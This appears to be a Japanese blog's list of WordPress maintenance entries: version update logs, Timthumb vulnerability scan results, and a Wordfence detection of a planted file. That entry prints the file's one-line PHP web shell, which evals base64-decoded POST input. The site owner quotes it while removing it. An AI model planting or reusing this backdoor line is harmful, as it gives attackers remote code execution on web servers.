• Satellite Store for LP Records and Digital Items
    熊本地震復興支援チャリティーコンサート

    WordPress、プラグイン、テーマのアップデート定期メンテナンス9月

    定期更新 2015年9月期 WordPress のグレードアップと、プラグインとテーマをアップデート。2015年8月18日に WordPress 4.3 にメジャーアップグレードが有った。年内にはもう一度グレードアップと成るだろう。関数が変更されているが、使用しているテーマは変更に対応している、100%動作保証されたプラグインばかりだったので難点はなかった。

    Read More


    熊本地震復興支援チャリティーコンサート

    WordPress、プラグイン、テーマのアップデート定期メンテナンス8月

    定期更新 2015年8月期 WordPress のアップデートと、プラグインとテーマをアップデート。来週明けの2015年8月18日には WordPress 4.3 にメジャーアップグレードが有る。4.2 系では最後のメンテナンス作業と成るだろうか、100%動作保証されていたのでプラグインとテーマのアップデートは難しいことはなかった。

    Read More


    熊本地震復興支援チャリティーコンサート

    プラグインとテーマのアップデート 2015年7月

    実行作業 プラグインのアップデート。 Akismet 3.1.2 → 3.1.3 Beaver Builder Plugin (Lite Version) 1.5.9 → 1.6.0.1 Google AdSense by BestWebSoft 1.34 → 1.35 Header and Footer 1.6.4 → 1.6.5 Jetpack by WordPress.com 3.5.3 → 3.6 WP Google Fonts v3.1.2 → v3.1.3 テーマのアップデート。 Exclusive 1.0.28 → 1.0.30 Responsive 1.9.7.6 → 1.9.7.7

    Read More


    熊本地震復興支援チャリティーコンサート

    プラグインとテーマのアップデート 2015年6月

    実行作業 プラグインのアップデート。 Akismet 3.1.1 → 3.1.2 Beaver Builder Plugin (Lite Version) 1.5.6 → 1.5.9 Google AdSense by BestWebSoft 1.33 → 1.34 WP Google Fonts v3.1.1 → v3.1.2 テーマのアップデート。 Auberge 1.4.4 → 1.4.7 ColorWay 3.3.2 → 3.3.3 EvoLve 3.2.7 → 3.3.0 Montezuma 1.2.7 → 1.2.8

    Read More


    熊本地震復興支援チャリティーコンサート

    コアのアップグレード、プラグインとテーマのアップデート 2015年5月

    実行作業 WordPressのアップグレード。 4.1.5 → 4.2.2-Ja プラグインのアップグレード。 Akismet 3.0.4 → 3.1.1 Jetpack by WordPress.com 3.3.3 → 3.5.3 WP Multbyte Patch 2.2 → 2.3.1 プラグインのアップデート。 Page Links To 2.9.5 → 2.9.6 Child Pages Shortcode 1.9.2 → 1.9.3 Google AdSense by BestWebSoft 1.32 → 1.33 Header and Footer 1.6.3 → 1.6.4 TinyMCE Templates 4.3.3 → 4.3.6 Wordfence Security 5.3.6 → 5.3.12 テーマのアップデート。 Twenty Fifteen 1.0 → 1.2 Twenty Ten 1.8 → 1.9 Twenty Eleven 2.0 → 2.1 Twenty Thirteen 1.4 → 1.5 Twenty Twelve 1.6 → 1.7 Twenty Fourteen 1.3 → 1.4 Auberge 1.2.5 → 1.4.4 ColorWay 3.3.0 → 3.3.2 EvoLve 3.1.0 → …

    Read More


    熊本地震復興支援チャリティーコンサート

    パーマリンクを変更 2015/3/4

    /%category%/%postname%/ から /%postname%/

    Read More


    熊本地震復興支援チャリティーコンサート

    コアのアップグレード、プラグインとテーマのアップデート 2015年3月

    実行作業 WordPressのアップグレード。 3.8 → 4.1.1-Ja プラグインのアップグレード。 Akismet 2.5.9 → 3.0.4 Child Pages Shortcode 1.8.0 → 1.9.2 Google AdSense 1.26 → 1.32 Header and Footer 1.4.5 → 1.6.2 Maintenance 2.0.1 → 2.4 Wordfence Security 3.8.9 → 5.3.6 プラグインのアップデート。 Page Links To 2.9.3 → 2.9.4 テーマのアップデート。 WordPress Default 1.6 → 1.7.2 WordPress Classic 1.5 → 1.6 Twenty Ten 1.6 → 1.8 Twenty Eleven 1.7 → 2.0 Twenty Thirteen 1.1 → 1.4 Twenty Twelve 1.3 → 1.6 Twenty Fourteen 1.0 → 1.3 Yoko 1.1 → 1.2.1 ColorWay 3.1 → 3.2.9 EvoLve 2.8.0 → 3.1.0 ComicPress 4.0.5 → 4.2.1 Gommero 1.1.3 → 1.2.0 Montezuma 1.1.9 →1.2.4 …

    Read More


    熊本地震復興支援チャリティーコンサート

    コアのアップグレード、プラグインとテーマのアップデート

    実行作業 WordPressのアップグレード。 3.6.1 → 3.8 プラグインのアップグレード。 Maintenance 1.2.3 → 2.0.1 プラグインのアップデート。 Jetpack by WordPress.com 2.5 → 2.7 Google AdSense Plugin 1.22 → 1.26 Header and Footer 1.4.4 → 1.4.5 TinyMCE Templates 3.1.0 → 3.3.0 Wordfence Security 3.8.3 → 3.8.9 WP Multibyte Patch 1.7 → 1.9 テーマのアップデート。 Twenty Eleven 1.6 → 1.7 Twenty Thirteen 1.0 → 1.1 Twenty Twelve 1.2 → 1.3 Yoko 1.0.5 → 1.1 ColorWay 3.0 → 3.1 EvoLve 2.5.0 → 2.8.0 Magazine Basic 3.0.3 → 3.0.4 Pinboard 1.1.0 → 1.1.2 Responsive 1.9.3.5 → 1.9.4.3

    Read More


    熊本地震復興支援チャリティーコンサート

    プラグインとテーマのアップデート。

    実行作業 WordPressのマイナーアップデート。 3.6 → 3.6.1 プラグインとテーマのアップデート。 Jetpack by WordPress.com 2.3.5 → 2.4.2 Google AdSense Plugin 1.21 → 1.22 Maintenance 1.2.2 → 1.2.3 Comic Press 2.9.4 → 4.0.4 Origin 0.5.3 → 0.5.6 Responsive 1.9.3.5 → 1.9.3.6

    Read More


    熊本地震復興支援チャリティーコンサート

    登録ユーザーを削除

    akismet は有効だったためスパムコメントは無し。ユーザー登録は出来ないように設定されてあったのに、登録されているユーザー二人を削除。

    Read More


    熊本地震復興支援チャリティーコンサート

    Wordfence スキャン index.bak.php を検出

    Wordfence をインストール。スキャンでの不正ファイルを発見。これをFTPで削除。 1日1回定期審査のメール受信をアクティベートする。 This file may contain malicious executable code Filename: index.bak.php File type: Not a core, theme or plugin file. Issue first detected: 33 mins ago. Severity: Critical Status New This file is a PHP executable file and contains an eval() function and base64() decoding function on the same line. This is a common technique used by hackers to hide and execute code. If you know about this file you can choose to ignore it to exclude it from future scans. index.bak.php が作成され、次の一行が書かれていた。 <?php ($_=$_POST).($_1=’_’).($_4=$$_1).($_4=$_4[$_1]).($_4($$_1)).eval(base64_decode($_4($$_1)));?> .htaccess には改ざんされた様子はない。偽装ファイルも無いようで、恐らく3つのサイトを入れ替えながら更新している過程で改ざんされたと思われる。

    Read More


    熊本地震復興支援チャリティーコンサート

    Timthumb をスキャン 5ファイルを検出、3ファイルが脆弱

    Timthumb と類似のファイルを検出。5ファイルのうち3ファイルは脆弱でバックドアにされている可能性もある。 テーマ『Arras Theme』内ライブラリに Timthumb を発見したので、当テーマを削除。 テーマ『Producer』内に Timthumb を発見したので、当テーマを削除。 テーマ『NewsPaper』内スクリプトに Timthumb を発見したので、当テーマを削除。 テーマ『Berita Free』内ライブラリに Timthumb を発見したので、当テーマを削除。   Status Version Filename Full Path Outdated 2.8.3 timthumb.php /home/〜/wp-content/themes/arras-theme/library/timthumb.php Vulnerable 1.12 cropper.php /home/〜/wp-content/themes/producer/cropper.php Outdated 2.8.10 resize.php /home/〜/wp-content/themes/newspaper/scripts/resize.php Vulnerable 2.8 thumb.php /home/〜/wp-content/themes/berita_free/lib_frame/thumb.php Vulnerable 0 timthumb-config.php /home/〜/wp-content/themes/berita_free/lib_frame/timthumb-config.php

    Read More